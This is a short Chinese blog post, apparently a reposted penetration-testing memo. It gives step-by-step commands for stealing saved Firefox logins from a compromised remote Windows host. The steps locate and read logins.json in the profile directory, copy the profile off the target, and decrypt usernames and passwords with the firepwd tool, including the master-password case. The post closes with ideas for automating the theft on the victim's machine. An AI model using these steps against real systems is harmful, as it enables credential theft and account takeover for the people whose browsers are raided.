标签:appdata 指定 odi add exec 导出 res 账号 word
访问 about:logins
信息:
保存位置
%APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\ #xxxxxxxx 为随机字母和数字的组合
logins.json文件
dir %APPDATA%\Mozilla\Firefox\Profiles\*logins.json /s /b
查看内容
type C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\xx.default-release\logins.json
可以查看到,所记录的URL,用户名,加密后的密码。创建时间等信息。
工具:firepwd
https://github.com/lclevy/firepwd
python3 -m pip install -r requirements.txt ##安装 PyCryptodome>=3.9.0 pyasn1>=0.4.8
下载远程主机的 C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\xx.default-release\ 目录下的
本地执行
python firepwd.py -d new_db\
获取到账号密码。
wmic process where name=‘firefox.exe‘ get executablepath,processid ##查看火狐浏览器位置
firefox.exe -profile C:\Windows\temp\data1 #启动firefox 并导出
会将Firefox 配置文件导入到指定目录。
Master Password # 用户手工加了个面膜 (暂时没有遇到目标自己去做这件事,就先不研究了)
如有遇到,解密,用上面的脚本 加-p 参数 输入Master Password的密码 即可,
1.如果可以在对方机器执行EXE,自己打包python脚本 进行自动化或许
2.或者用go自己写一个..
标签:appdata 指定 odi add exec 导出 res 账号 word
原文地址:https://www.cnblogs.com/0xdd/p/13226624.html
